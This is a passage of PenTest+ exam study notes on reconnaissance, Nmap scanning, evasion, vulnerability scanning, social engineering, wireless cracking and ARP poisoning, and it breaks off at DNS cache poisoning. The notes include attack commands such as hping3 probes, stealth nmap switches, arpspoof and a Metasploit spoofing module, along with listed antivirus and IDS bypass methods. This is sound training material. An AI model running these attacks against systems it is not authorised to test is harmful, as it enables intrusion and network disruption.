▪ Engaging with the targeted systems or networks to gather information
about their vulnerabilities

o Domain 2: Information Gathering and Vulnerability Scanning

▪ Objective 2.2
● Given a scenario, perform active reconnaissance
▪ Objective 2.3
● Given a scenario, analyze the results of a reconnaissance exercise

● Scanning and Enumeration

o Scanning
▪ Actively connecting to a system and getting a response to identify hosts,
opens ports, services, users, domain names, and URLs used by a given
organization
● Discovery Scan
o Ping Scan
▪ Identifies what hosts are online in a given network
o Port Scan
▪ Identifies whether the ports on those hosts are
open or closed
● Enumeration
o Enumeration digs deep into target systems and links
identified components into known vulnerabilities

● Nmap/Zenmap
o Nmap
▪ Requires exact syntax
o Zenmap
▪ Provides dropdown menu

o Ping scan
o Quick scan
o Intense scan

- 41 -

o Fingerprinting
▪ The identification of an operating system, a service, or a specific software
version that is in use by a host, a system, or a network

o Banner Grabbing
▪ Using a program like Netcat, wget, or telnet to connect to a given port
that is running a service

▪ Scanning
● More generic
▪ Enumeration
● More in depth
▪ Fingerprinting
● Most detailed

● Other Enumeration
o Host
▪ Any server, workstation, client, which can also include mobile devices,
tablets, and IoT devices, or even a networking device like a switch, router,
or access point
▪ We can enumerate the hosts using command line-based Windows tools
to learn more about the target network

▪ “Living off the land”

● Using the default tools available on a regular user's workstation

▪ Commands
● net
o A suite of tools that can be used to perform operations on
groups, users, account policies, network shares, and more

● arp
o Used when enumerating a Windows host
o Address Resolution Protocol (ARP) Cache
▪ Provides a list of all the other machine’s MAC
addresses that have recently communicated with
the host you are currently on

- 42 -

● ipconfig
o Determines the IP address of the machine you are
currently on

o ipconfig /displaydns
▪ Displays any DNS names that have recently been
resolved

▪ BASH command line tools for Linux hosts or servers

● finger
o Used to view a user's home directory, their login, and their
current idle time

● uname -a
o Shows the OS’s name, version, and other relevant details
displayed to the terminal

● env
o Gives a list of all of the environment variables on a Linux
system

o Services
▪ Can be enumerated to provide us with additional details about a given
host
▪ Conducting an intensive scan using Nmap returns information about the
services running on a host’s open ports

o Domains
▪ Active Directory (AD)
● A database that stores, organizes, and enables access to other
objects under its control

▪ Many Windows attacks rely on trying to bypass the Kerberos

authentication in a domain environment
● The first domain is always considered the root domain
o Domains or subdomains underneath the root domain are
considered children

- 43 -

▪ Organizational Unit (OU)

● Used within a domain to group similar objects (i.e., computers,
groups, or even users) together

▪ User
● Used to represent a person or process that will access a given
resource in the domain

▪ Group
● A collection of users

▪ Domain Enumeration
● PowerShell
o Living off the land
o Get-NetDomain
▪ Lists the current logged in user’s domain
o Get-NetLoggedon
▪ Lists of all the users who are logged into a given
computer

● Nmap, Metasploit
o Own tools

o Users
▪ Get-NetGroupMember
● Lists the domain members belonging to a given group

▪ net user
● Lists all the users on the machine

▪ net groups
● Lists the groups on the machine

o URLs
▪ You can use various tools to gain more details about the web server or
applications running on valid URLs

- 44 -

● Website Reconnaissance
o To conduct website reconnaissance, determine the:
▪ Software
▪ Operating system
▪ Hosting
▪ Resources
▪ Hidden information

o Website Build
▪ Programmers
▪ Content Management System (CMS)
▪ Page builder

o Identify vulnerabilities that may exist in those frameworks and platforms

o Find every page that exists on the website, because any page can hold a
vulnerability

o Website Crawling (Forced Browsing)

▪ The process of systematically attempting to find every page on a given
website

▪ Prevention
● robots.txt
o Used to tell the web crawlers which directories and paths
are allowed to be crawled and which should be ignored
o Also enable directory permissions in addition to using
robots.txt file

▪ DirBuster
● A free tool by OWASP that can conduct brute-force web crawling
by trying all various combinations of directories and file name to
find hidden data

o Web Scraping/Harvesting/Data Extraction

▪ A technique used for extracting data from websites performed using
automation or through manual processes

- 45 -

▪ Custom Word List Generator (CeWL)

● A Ruby app that can crawl a given URL up to a specified depth and
return a list of words that can be used with a password cracker

● Detecting and Evading Defenses

o Load Balancer

▪ A core networking solution that distributes traffic across multiple servers

inside a server farm
▪ Allows multiple servers to answer as a single server

▪ Load Balancing Detector (LBD)

● Determines the presence of a load balancer

▪ Load balancers can throw off scan results with increased false positives or
false negatives

o Firewall
▪ A type of network security device that monitors and filters incoming and
outgoing network traffic

▪ Relies on a set of rules known as an access control list (ACL)

▪ Traceroute
● Detects if an organization uses firewall

- 46 -

▪ Firewalk
● An active reconnaissance tool that tries to determine what layer 4
protocols a given firewall will actually pass past it
● Lets you move through the firewall and identify the rule sets

o Web Application Firewall (WAF)

▪ Utilizes specific rule sets to prevent common attacks against web
applications, such as cross-site scripting and SQL injections

▪ Key Indicators
● Personalized cookies in HTTP packets
● Header alterations
● WAF notifications

▪ Use obfuscation techniques to confuse these web applications

o Antivirus
▪ A specific type of software that is used to prevent, scan, detect, and
delete viruses or malware

▪ Bypass Methods
● Metamorphic virus
● Signature obfuscation
● Fileless malware
● Encryption

● Packet Crafting
o Packet Crafting
▪ A technique that allows for the generation of a network packet with the
specific data content described by an attacker or penetration tester

▪ Use Cases
● Setting up unusual TCP flags to see firewall response
● Fragmenting packets

▪ Aim to use as few packets as possible to reach objectives

- 47 -

▪ Methods
● Command line (Hping)
● GUI
● Script (Scapy)

▪ Common Tools
● Hping
o An open-source spoofing tool that provides a pen tester
with the ability to craft network packets to exploit
vulnerable firewalls and IDS/IPS

o Host/Port Detection and Firewall Testing

▪ Sends a SYN or ACK packet to conduct detection
and testing
▪ # hping3 –S –p80 –c1 192.168.1.1
● Send 1 SYN packet to port 80
▪ # hping3 –A –p80 –c1 192.168.1.1
● Send 1 ACK packet to port 80

o Timestamping
▪ Used to determine the system’s uptime
▪ # hping3 –c2 –S p80 --tcp-timestamp 192.168.1.1
● Send 2 SYN packets to port 80 to determine
uptime

o Traceroute
▪ Uses arbitrary packet formats, such as probing DNS
ports using TCP or UDP, to perform traces when
ICMP is blocked on a given network
- 48 -

o Fragmentation
▪ Attempts to evade detection by IDS/IPS and
firewalls by sending fragmented packets across the
network for later reassembly

o Denial of Service (DoS)

▪ Can be used to perform flood-based DoS attacks
from randomized source Ips

o Fragmentation and DoS are not likely to be effective

against most modern OS and network appliances

● Scapy
o A powerful, interactive packet manipulation tool, packet
generator, network scanner, network discovery, packet
sniffer, and more in one script

o Scapy
▪ Runs on Python 2
o Scapy 3
▪ Runs on Python 3

● Eavesdropping
o Eavesdropping
▪ The act of secretly or stealthily listening to a private conversation or
communications of others without their consent in order to gather
information

▪ Methods
● Non-Technical
o Social engineering
● Technical
o Technology

▪ Check if eavesdropping is within the scope and agreed upon for the
assessment

- 49 -

o Packet Sniffing
▪ Involves capturing all the data packets that were sent over the targeted
network

▪ Tools
● Wireshark
o Contains a graphical user interface and can be used to
capture packets, analyze those packets, and identify the
desired information if it was unencrypted when sent
● TCPDump

▪ To perform network sniffing:

● Place network card into promiscuous mode to capture all the
traffic it sees and write the packets into a PCAP file

● Protocol Analyzer
o A specialized type of software that collects raw packets
from the network
o Network defenders should always utilize encryption
techniques to protect the data in transit
o Protocol analyzers can help prove or disprove statements
made by administrators

▪ Packet capture is easier to perform on wireless networks since they

operate like a hub

▪ Useful Metadata from Encrypted Data

● Source/Destination IP/Ports
● Protocol types
● Data volume

o Flow Analysis
▪ Identifies which resources and servers are communicating with which
type of devices or locations
▪ Highlights trends and patterns in the network traffic
▪ Flow analysis focuses on metadata, while protocol analyzers can look into
the packets and see the data they contain

- 50 -

● Wardriving
o Wardriving
▪ Driving around near a facility to detect if there are any wireless networks
you can exploit

o Warwalking
▪ Walking around near a facility to detect if there are any wireless
networks you can exploit

o Target Data
▪ Open wireless access points

▪ Encrypted access points

● Wireless networks are much less secure than wired networks

▪ Device configurations
● Guest network
● Business network

o Wigle.net
▪ Maps and indexes all open access points that have been found

o Antenna
▪ Decibels Per Isotropic (dBi)
● Measures the strength of an antenna in terms of how good it can
listen and collect information

▪ Classification
● Unidirectional
o Focuses power in one direction for covering greater
distances
● Bidirectional (Dipole)
o Radiates power equally in two directions

● Omnidirectional
o Radiates power equally in all directions

- 51 -

o Signal-to-Noise Ratio (SNR)

▪ Measures the wireless signal strength in relation to the background nois

o Use omnidirectional antenna for wardriving and warwalking

o There are other networks than just Wi-Fi

- 52 -

Vulnerability Scanning
● Vulnerability Scanning
o Vulnerability Scanning
▪ The process of assessing a computer, server, network, or application for
known weaknesses
● System weaknesses
● Report
● Recommendations

o Domain 2: Information Gathering and Vulnerability Scanning

▪ Objective 2.3
● Given a scenario, analyze the results of a reconnaissance exercise
▪ Objective 2.4
● Given a scenario, perform vulnerability scanning

● Vulnerability Lifecycle
o Vulnerability
▪ Any weakness in a system that can be exploited by a threat actor to gain
unauthorized access to a computer system

o Attack Surface
▪ Client
▪ Server
▪ Network device

- 53 -

o Unknown (Zero-Day) Vulnerability

▪ Any unpublished vulnerability somebody has discovered and has not yet
made known to the manufacturer

▪ Figure out how to mitigate the effects of the vulnerability

o As a penetration tester, you’re constantly looking for new ways to break into
systems
▪ There’s 5 to 10 percent of systems with missing patches

● Vulnerability Scans
o Vulnerability Scanning
▪ A specialized type of automated scan for hosts, systems, and networks to
determine the vulnerabilities that exist on a given system

o Vulnerability Scanning Tools

▪ OpenVAS
▪ Nessus
▪ QualysGuard
▪ Nexpose
▪ Nmap

▪ Vulnerability scanning tools are only as good as the configurations used

o Vulnerability Scanning Types

▪ Credentialed Scan
● Uses an authorized user or administrator’s account credentials to
be performed

- 54 -

● Credentialed scans are usually performed by the network

defenders and cybersecurity analysts

▪ Non-Credentialed Scan
● Conducted when the vulnerability scanner does not have valid
user or admin login credentials

o Scanning Types
▪ Discovery Scan
● The least intrusive type of scan and can be as simple as
conducting a ping sweep

▪ Full Scan
● A full scan gets easily detected by network defenders and
cybersecurity analysts

▪ Stealth Scan
● Conducted by sending a SYN packet and then analyzing the
response

SYN
SYN/ACK
RST

● Evading Detection
o Slow down scans
o Break into individual scans
o Mask true source

▪ Compliance Scan
● Used to identify vulnerabilities that may affect compliance with
regulations or policies
● Example: PCI-DSS scan

- 55 -

● Tools
o Nmap
▪ A great tool for mapping out the network, finding
open ports, running services, and the basic
versioning of each service

▪ Nmap Scripting Engine (NSE)

● Conducts basic vulnerability scanning using
Nmap

o Nessus
▪ Used to scanning the target network and then
create a report of the vulnerabilities, missing
patches, and misconfigurations that exist

o Nexpose
▪ A vulnerability scanner made by Rapid7

o QualysGuard
▪ Another commercially available vulnerability
scanner

o OpenVAS
▪ An open-source vulnerability scanne

o Nikto
▪ Can assess custom web applications that a
company may have coded themselves

● Scanning Considerations
o Time
▪ Not all scans will take the same amount of time

o Protocols
▪ Each protocol scanned will take time and resources

- 56 -

o Network Topology

o Bandwidth Limitations
▪ The location of the scan depends on your engagement goals and the type
of asset you are scanning

o Query Throttling
▪ Reduces the number of queries launched by the scanner at a given time

o Fragile Systems
▪ Determine any fragile or non-traditional systems that could be affected
by vulnerability scanning activities

o Properly scope vulnerability scans to minimize the impact to the targeted

organization

Nmap
- 57 -

● Nmap
o Domain 2: Information Gathering and Vulnerability Scanning
▪ Objective 2.3
● Given a scenario, analyze the results of a reconnaissance exercise
▪ Objective 2.4
● Given a scenario, perform vulnerability scanning

o Expect more in depth Nmap questions on the PenTest+ exam

▪ Read
▪ Understand
▪ Identify

● Nmap Discovery Scans

o Nmap Security Scanner
▪ A versatile port scanner used for topology, host, service, and OS
discovery and enumeration
▪ An nmap discovery scan is used to footprint the network

o Basic Syntax
▪ # nmap 192.168.1.0/24

o Host Discovery Scan

▪ # nmap –sn 192.168.1.0/24

o Nmap Switches
▪ There are many types of scanning options that you can utilize by entering
different nmap switches
● List Scan (-sL)
o Lists the IP addresses from the supplied target range(s)
and performs a reverse-DNS query to discover any host
names associated with those IPs

● TCP SYN ping (-PS <PortList>)

o Probes specific ports from the given list using a TCP SYN
packet instead of an ICMP packet to conduct the ping
● Sparse Scanning (--scan-delay <Time>)

- 58 -

o Issues probes with significant delays to become stealthier

and avoid detection by an IDS or IPS

● Scan Timing (-Tn)

o Issues probes with using a timing pattern with n being the
pattern to utilize (0 is slowest and 5 is fastest)

● TCP Idle Scan (-sI)

o Another stealth method, this scan makes it appear that
another machine (a zombie) started the scan to hide the
true identity of the scanning machine

● Fragmentation (-f or --mtu)

o A technique that splits the TCP header of each probe
between multiple IP datagrams to make it hard for an IDS
or IPS to detect

o The results of a discovery scan should be a list of IP addresses and whether they
responded to the probes

o Nmap Output
▪ Interactive (default) to screen
▪ Normal (-oN) to file
▪ XML (-oX) to file
▪ Grepable (-oG) to file
▪ XML or grepable output can be integrating with most SIEM products

● Nmap Port Scans

o After your footprinting is complete, it is time to begin fingerprinting hosts

o Service Discovery
▪ Determine which network services and operating systems are in use by a
target
▪ Service discovery can take minutes to hours to complete

o Warning

- 59 -

▪ While some scans are described as “stealthy”, a well-configured IDS/IPS

can detect most Nmap scanning

o TCP SYN (-sS)

▪ Conducts a half-open scan by sending a SYN packet to identify the port
state without sending an ACK packet afterwards

o TCP Connect (-sT)

▪ Conducts a three-way handshake scan by sending a SYN packet to
identify the port state and then sending an ACK packet once the SYN-ACK
is received

o Null Scan (-sN)

▪ Conducts a scan by sending a packet with the header bit set to zero

o FIN Scan (-sF)

▪ Conducts a scan by sending an unexpected FIN packet

o Xmas Scan (-sX)

▪ Conducts a scan by sending a packet with the FIN, PSH, and URG flags set
to one

o UDP Scan (-sU)

▪ Conducts a scan by sending a UDP packet to the target and waiting for a
response or timeout

o Port Range (-p)

▪ Conducts a scan by targeting the specified ports instead of the default of
the 1,000 most commonly used ports

o These techniques can be more or less stealthy, as well as combined with the
options covered in the discovery scan lesson

o Port States
▪ Open
● An application on the host is accepting connections

▪ Closed

- 60 -

● The port responds to probes by sending a reset [RST] packet, but

no application is available to accept connections

▪ Filtered
● Nmap cannot probe the port, usually due to a firewall blocking
the scans on the network or host

o Other Port States (displayed if the scan cannot determine a reliable result)
▪ Unfiltered
● Nmap can probe the port but cannot determine if it is open or
closed

▪ Open|Filtered
● Nmap cannot determine if the port is open or filtered when
conducting a UDP or IP protocol scan

▪ Closed|Filtered
● Nmap cannot determine if the port is closed or filtered when
conducting a TCP Idle scan

o Port states are important to understand because an open port indicates a host
that might be vulnerable to an inbound connection

● Nmap Fingerprinting
o Fingerprinting
▪ A technique to get a list of resources on the network, host, or system as a
whole to identify potential targets for further attack

o Once open ports are discovered, use Nmap to probe them intensely
▪ # nmap –sV 192.168.1.1
▪ # nmap –A 192.168.1.1

o An intensive fingerprint scan can provide more detailed information

▪ Protocol
▪ Application name and version
▪ OS type and version
▪ Host name

- 61 -

▪ Device type

o How does Nmap fingerprint what services and versions are running?
▪ Common Platform Enumeration (CPE)
● Scheme for identifying hardware devices, operating systems, and
applications developed by MITRE

▪ Nmap Scripting Engine (NSE)

● Scripts are written in the Lua scripting language that can be used
to carry out detailed probes
o OS detection and platform enumeration
o Windows user account discovery
o Identify logged-on Windows user
o Basic vulnerability detection
o Get HTTP data and identify applications
o Geolocation to traceroute probes

● Using Nmap

- 62 -

Social Engineering and Physical Attacks

● Social Engineering and Physical Attacks
o Social Engineering
▪ A broad range of malicious activities accomplished through human
interactions
▪ Non-technical attacks

o Domain 3: Attacks and Exploits

▪ Objective 3.6
● Given a scenario, perform a social engineering or physical attack

● Methods of Influence
o Authority
▪ People are more willing to comply with a request when they think it is
coming from someone in authority
▪ Use of recognizable brand names like a bank or PayPal could be
considered a form of authority
● CEO or manager
● Important client
● Government agency
● Financial institution

o Urgency
▪ People are usually in a rush these days and urgency takes advantage of
this fact
▪ Approaching deadline, time-based

o Social proof
▪ People are more likely to click on a link through social media or based on
seeing others have already clicked on it
▪ Use social proof to make people crave to be part of a social group,
experience, or interaction

o Scarcity
▪ Technique that relies on the fear of missing out on a good deal that is
only offered in limited quantities or a limited time
- 63 -

▪ Limited supply, quantity-based

o Likeness/Likeability
▪ A technique where the social engineer attempts to find common ground
and shared interests with their target
▪ Social engineers are some of the most likeable people you will meet

o Fear
▪ The use of threats or demands to intimidate someone into helping you in
the attack

o Example
▪ Click on this email right now because we only have three things left.
These will only be on sale for the next 30 minutes.
We have 100 people who already bought.

● Social Engineering
o Social Engineering
▪ Any attempt to manipulate users to reveal confidential information or
perform actions detrimental to a system’s security
▪ End users and employees are the weakest link in an organization’s
security

o Phishing
▪ A social engineering attack where the malicious actor communicates with
the victim from a supposedly reputable source to lure the victim into
divulging sensitive information

o Spearphishing
▪ Uses the same technology and techniques but is a more targeted version
of phishing
▪ During a penetration test, you are most likely to conduct spearphishing
and not phishing

o Whaling
▪ Focused on key executives within an organization or other key leaders,
executives, and managers in the company

- 64 -

● Busy executives
● Better targeted
● Older and technically challenged executives

o Smishing
▪ Occurs when the message is being communicated to the target thru text
messaging

▪ Short Message Service (SMS)

● The text message service component on cellphones,
smartphones, tablets, and other mobile devices

▪ Multimedia Messaging Service (MMS)

● A form of text messaging that also allows pictures, sound, or video
to be sent using the service

o Vishing
▪ Occurs when the message is being communicated to the target using the
voice functions of a telephone

o Business Email Compromise (BEC)

▪ Occurs when an attacker takes over a high-level executive’s email
account and orders employees to conduct tasks

o Pharming
▪ Tricks users into divulging private information by redirecting a victim to a
website controlled by the attacker or penetration tester

● Baiting Victims
o USB Drop Key
▪ It is human nature to be nice or to be curious

▪ Rubber Ducky
● A specialized type of software that is installed on a USB drive and
runs different commands once plugged in

- 65 -

o Watering hole attack

▪ Malware is placed on a website that you know your potential victims will
access

o Typosquatting/URL Hijacking
▪ A social engineering attack that deliberately uses misspelled domains for
malicious purposes and is often used in combination with a watering hole
attack

● Impersonation
o Impersonation
▪ The act of pretending to be someone else in order to gain access or
gather information
▪ The goal is to use people’s trust on a person in authority and people in
uniform

o Elicitation
▪ The ability to draw, bring forth, evoke, or induce information from a
victim

o Impersonation and elicitation can be used in combination with other in-person

or remote attack techniques

● Physical Security
o Physical security is just as important in keeping attackers out of a given network

o Main Areas
▪ Perimeter
- 66 -

▪ Building
▪ Room or datacenter

o Some organizations rely on surveillance cameras and closed-circuit TV (CCTV)

▪ Wired
● Placed around the building and will be physically cabled from the
camera all the way to a central monitoring station

▪ Wireless
● Subject to interference with other wireless systems and
frequencies
● Many wireless security systems operate in the unregulated 2.4
GHz wireless spectrum

▪ Indoor/Outdoor

▪ PTZ (Pan, Tilt, Zoom)

▪ Infrared
● Can produce an image based on the relative heat levels in view

▪ Ultrasonic System
● A type of surveillance system that uses sound-based detection

o Take note of the placement of the security cameras being used

o You need to get past the perimeter defenses and get into the building

o Locking Mechanisms
▪ Physical key
▪ PIN
▪ Wireless signal
▪ Biometrics

o Access Control Vestibule (Mantrap)

▪ An area between two doorways that holds people until they’re identified
and authenticated

- 67 -

▪ Bypass Methods
● Tailgating
● Piggybacking
● Badge cloning

o Biometrics
▪ Rely on physical characteristics to identify a person properly
● Something you know
● Something you have
● Something you are
● Something you do
● Somewhere you are

▪ False Acceptance Rate (FAR)

● Rate that a system authenticates a user as authorized or valid
when they should not have been granted access to the system

▪ False Rejection Rate (FRR)

● Rate that a system denies a user as authorized r valid when they
should have been granted access to the system
▪ Crossover Error Rate (CER)
● An equal error rate (ERR) where the false acceptance rate and
false rejection rate are equal

● Physical Attacks
o Tailgating
▪ Entering a secure portion of the organization’s building by following an
authorized person into the area without their knowledge or consent
▪ Identify the habits of the employees as they are using the doors and the
way the doors themselves function

o Piggybacking
▪ Occurs when an attacker attempts to enter a restricted area or get past
an access control vestibule by following an authorized employee with
their knowledge or consent
● Influence
● Impersonation

- 68 -

● Elicitation
▪ Piggybacking works well in large organizations where all the employees
don’t know each other

o Shoulder Surfing
▪ Occurs when an attacker attempts to observe a target’s behavior without
them noticing

o Eavesdropping
▪ Listening to conversations and performing direct observation through
hearing

o Dumpster Diving
▪ Occurs when an attacker searches inside trash or recycling containers for
personal, sensitive, or confidential information or other items of value

o Badge Cloning
▪ The act of copying authentication data from an authorized user’s badge
▪ The easiest badges to clone are badges with RFID and NFC tags
embedded in them
▪ Newer RFID badges use higher frequencies that provide higher data rates
and can support encryption
▪ For NFC-based badges, a penetration tester needs to be extremely close
to the badge they want to clone, usually within just a few inches

● Social Engineering Tools

o Social Engineering Toolkit (SET)
▪ A Python-based collection of tools and scripts that are used to conduct
social engineering during a penetration test

o Browser Exploitation Framework (BeEF)

▪ Used to assess the security posture of a target environment using cross-
site attack vectors
▪ BeEF is a great tool for testing browsers and associated web servers and
applications

- 69 -

o Call Spoofing
▪ Hide identity
▪ Conduct impersonation attack
▪ Use the modern and up-to-date version of call spoofing programs for
your penetration tests

- 70 -

Wireless Attacks
● Wireless Attacks
o Domain 3: Attacks and Exploits
▪ Objective 3.2
● Given a scenario, research attack vectors and perform wireless
attacks
o Wireless networks are inherently less secure than a wired network

● Wireless Security
o Pre-Shared Key
▪ Used when the access point and the client need to use the same
encryption key to encrypt and decrypt the data

o Wired Equivalent Privacy (WEP)

▪ Original 802.11 wireless security standard that claims to be as secure as a
wired network
▪ WEP was designed to use a static 40-bit pre-shared encryption key with
RC4 encryption cipher
▪ WEP’s weakness is its 24-bit initialization vector (IV)

o Wi-Fi Protected Access (WPA)

▪ Replacement for WEP which uses TKIP, Message Integrity Check (MIC),
and RC4 encryption
▪ WPA was flawed, so it was replaced by WPA2

o Wi-Fi Protected Access Version 2 (WPA2)

▪ 802.11i standard that provides better wireless security featuring AES with
a 128-bit key, CCMP, and integrity checking
▪ WPA2 can be operated in either personal or enterprise mode

o Wi-Fi Protected Access Version 3 (WPA3)

▪ Designed to strengthen the flaws and weakness that can be exploited
inside of WPA2

▪ Types
● WPA3 Enterprise
- 71 -

o 256-bit AES with SHA-384

● WPA3 Personal
o 128-bit AES with CCMP

▪ The largest improvement in WPA3 is the removal of the Pre-Shared Key

(PSK) exchange

▪ Simultaneous Authentication of Equals (SAE)

● Uses a secure password-based authentication and a password
authenticated, key agreement methodology to secure networks

▪ Forward Secrecy/Perfect Forward Secrecy

● A feature of a key agreement protocol that provides assurance
that session keys will not be compromised even if long-term
secrets used in the session key exchange are compromised

● Process
o AP and the client use a public key system to generate a
pair of long-term keys
o AP and the client exchange a one-time use session key
o AP sends client messages and encrypts them using the
created session key
o Client decrypts received messages using the same one-
time use session key
o Process repeats for each message being sent, starting at
Step 2 to ensure forward secrecy

- 72 -

o “If we make operations easier, then security is reduced.”

o Wi-Fi Protected Setup (WPS)

▪ Designed to make setting up new wireless devices easier for consumers
and end users
▪ WPS relies on an 8-digit PIN code to conduct its authentication
▪ WPS is vulnerable to attacks and should always be disabled
▪ As a penetration tester, identify those WPS-enabled devices for your
engagements

o MAC Filtering
▪ Defines a list of devices and only allows those on your Wi-Fi network

● Signal Exploitation
o Aims to collect, manipulate, and exploit the wireless radio waves and signals that
are passing freely throughout a given location

o Types of Antennas
▪ Omnidirectional
● Radiates power equally in all directions
● Omnidirectional is the least secure method of transmission
● An omnidirectional antenna is what is connected by default to
your laptop’s Wi-Fi card

▪ Unidirectional (e.g., Yagi antenna)

● Focuses power in one direction for covering greater distances
● You can use omnidirectional antenna to identify targets, then
switch to unidirectional antenna

o Decibels Per Isotropic (dBi)

▪ Amount of forward gain of a given antenna
▪ As the forward gain increases, the signal becomes more directional

o Types of Signal Exploitation

▪ Eavesdropping
● By default, a wireless network card ignores signals addressed to
someone else’s MAC address

- 73 -

● Promiscuous Mode
o A type of computer networking operational mode in which
all network data packets can be accessed and viewed by all
network adapters operating in this mode

● Useful information
o Network client MAC addresses
o Type of encryption used
o Network client devices

▪ Deauthentication
● Used to boot a victim wireless client off an access point so that it
is forced to reauthenticate
● Deauthentication attacks are mostly used in conjunction with
other attacks

● Aireplay-ng
o The most commonly used tool for conducting a
deauthentication attack

▪ Jamming
● Disrupts a Wi-Fi signal by broadcasting on the same frequency as
the target access point to block signals that a wireless transceiver
attempts to send or receive
● Check the scope and the legal restrictions in your location before
conducting jamming as part of an engagement

● Wi-Fi Jammer
o A Python script capable of disrupting signals of all wireless
access points in an area

● WEP Hacking
o WEP is extremely insecure due to its use of a 24-bit initialization vector (IV)

o Method
▪ Monitor the area to determine which access points and clients are in use
▪ Capture all the network traffic into a PCAP file to crack it offline later

- 74 -

▪ Conduct a deauthentication attack to generate handshakes to capture

▪ Crack the encryption protocol to identify the plain text pre-shared key

o WEP should never be used in a production network

o Airomon-NG
▪ Used to monitor wireless frequencies to identify access points and clients

o Airodump-NG
▪ Used to capture network traffic and save it to a PCAP file

● WPA/WPA2 Hacking
o Method
▪ Place the wireless network adapter into monitor or promiscuous mode
▪ Discover the WPA/WPA2 enabled networks in range
▪ Capture the network traffic and write it to a PCAP file
▪ Conduct a deauthentication attack to generate handshakes to capture
▪ Conduct a dictionary attack to identify the plain text version of the pre-
shared key

o Airomon-NG
▪ Used to place the network adapter into monitor or promiscuous mode

o Airodump-NG
▪ Used to identify clients and access points, capture network traffic, and
save it to a PCAP file

o Aireplay-NG
▪ Used to conduct a deauthentication attack by sending spoofed deauth
requests to the access point

o Airocrack-NG
▪ Used to conduct protocol and password cracking of wireless encryption

● WPS PIN Attacks

o The implementation used in WPS is flawed and vulnerable to attack

- 75 -

o WPS is great for operations, but horrible for security

o WPS uses an 8-digit PIN with the 8th digit reserved as a checksum

o 107 options mean there are 10,000,000 passwords

▪ The flaw is that WPS breaks the PIN into two smaller sections

o 104 options mean there are 10,000 unique PINs

o WPS is enabled by default in many consumer-grade and small business

environments

● Evil Twins
o Evil Twin
▪ A fraudulent Wi-Fi access point that appears to be legitimate but is set up
to eavesdrop on wireless communications

o Karma Attack
▪ Exploits the behavior of Wi-Fi devices due to a lack of access point
authentication protocols being implemented

▪ Preferred Network List (PNL)

● A list of the SSIDs of any access points the device has previously
connected to and will automatically connect to when those
networks are in range

- 76 -

o Captive Portal
▪ A web page that the user of a public-access network is obliged to view
and interact with before access is granted

o Tools
▪ ESPortalV2
● A piece of software for setting up a captive portal and redirecting
all Wi-Fi devices that connect to that portal for authentication

▪ Wifiphisher
● Sets up a regular evil twin without a captive portal

▪ Wi-Fi Pineapple
● A device that can be used to automate Wi-Fi auditing with
different types of campaigns and even created vulnerability
reports at the conclusion of your engagement

● On-Path and Relay Attacks

o On-Path Attack (formerly Man-in-the-Middle Attack)
▪ Occurs when an attacker puts themself between the victim
and the intended destination
▪ Monitors and captures data

o Relay Attack
▪ Captures, modifies, and sends data
- 77 -

▪ One of the easiest methods to execute an on-path or relay attack

is to execute an evil twin attack

o Extensible Authentication Protocol (EAP)

▪ Creates an encrypted tunnel between the supplicant and the
authentication server

▪ Protected Extensible Authentication Protocol (PEAP)

▪ EAP with Tunneled (EAP-TTLS)
▪ EAP with Flexible Authentication via Secure Tunneling (EAP-FAST)

- 78 -

● Bluetooth Attacks
o Bluejacking
▪ Sending unsolicited messages to a Bluetooth device
▪ No special tools or software is required to conduct bluejacking
▪ Sending information

o Bluesnarfing
▪ Making unauthorized access to a device via Bluetooth connection
▪ Aims to read sensitive data or information from a victim device
▪ Stealing and receiving information

o BlueBorne
▪ Allows the attacker to gain complete control over a device without even
being connected to the target device

o Bluetooth Low Energy (BLE)

▪ A Bluetooth variation that uses less energy and communicates wirelessly
over shorter distances
▪ BLE is extremely popular in smart home devices, motion sensors, and
other Internet of Things devices

o The Bluetooth protocol uses frequency hopping to prevent attackers from easily
capturing data being sent and received

o The password or PIN used to pair devices is only sent once during the initial
pairing

o Conducting Bluetooth Attacks

▪ HCICONFIG
● Configures Bluetooth interface

▪ HCITOOL
● Scans and discovers devices in range

▪ BLEAH
● Enumerates Bluetooth devices

▪ GATTTOOL/BETTERCAP/BLUEPY

- 79 -

● Interacts and communicates with Bluetooth devices

o Spooftooph
▪ Automates the spoofing or cloning of a Bluetooth device’s name, class,
and address

● RFID and NFC Attacks

o Radio Frequency Identification (RFID)
▪ A form of radio frequency transmission modified for use in authentication
systems
▪ Has two components, called the tag and the reader
▪ Should include a second authentication factor
▪ Newer RFID badges used in most modern authentication systems use
higher frequencies that provide higher data rates and can support
encryption

o Near Field Communication (NFC)

▪ Uses radio frequency to send electromagnetic charge containing the
transaction data over a short distance

- 80 -

Network Attacks
● Network Attacks
o Domain 3: Attacks and Exploits
▪ Objective 3.1
● Given a scenario, research attack vectors and perform network
attacks
o Most of the data we touch daily transits the network

● Stress Testing
o Stress Testing
▪ A software testing method that evaluates how software performs under
extreme load
● Processor load
● Memory load
● Network load
● Storage load
▪ Stress testing shows a server’s limits and architectural support

▪ Methods
● Python or PowerShell scripts
● Open-source software tools
● Software-as-a-Service solutions

o Packet/Broadcast/Network Storm
▪ Any large increase in network traffic directed at a target
▪ Random data sequence
▪ Character Generator Protocol
● Used in the in testing, debugging, and measuring of the network
and operates over either TCP or UDP on port 19

● Exploit Resources
o Exploit Database - exploit-db.com
▪ A complete collection of public exploits and vulnerable software kept in a
fully searchable database

- 81 -

o Packet Storm - packetstormsecurity.com

▪ Contains news articles, advisories, whitepapers, tools, and exploits that
can be reviewed and used in penetration tests

o Exploit Chaining
▪ Combines multiple exploits to form a larger attack
▪ Chained exploits can be run simultaneously or sequentially

● ARP Poisoning
o Address Resolution Protocol (ARP)
▪ Occurs automatically on a given local area network to identify which
workstation is currently assigned a particular IP address at any given time

o ARP Spoofing
▪ Sending falsified ARP messages over a local area network to get the ARP
caches to dynamically update with new information
▪ ARP spoofing attack can be used as a precursor to other attacks

▪ Prevention
● Prevent ARP poisoning by setting up good VLAN segmentation
and DHCP snooping

▪ Anytime a frame claims to have a new IP address for a given MAC

address, the routing switch will update its ARP cache

▪ Method
● Identify the MAC address and IP address using Wireshark or Nmap
o nmap -PR -sn <target>

● Use a spoofing tool such as Arpspoof or Metasploit

o arpspoof -i eth0 -t <IP>
- 82 -

o arpspoof -i eth0 -t <IP>

o msfconsole
o use axiliary/spoof/arp/arp_poisoning

● DNS Cache Poisoning

o Domain Name System (DNS)
▪ Converts domain names to IP addresses every time a user clicks on a link
or enters a domain name into their browser

o DNS Cache Poisoning

▪ Attempts to change the IP address of a domain name stored in the DNS
cache of a given DNS server

o Method
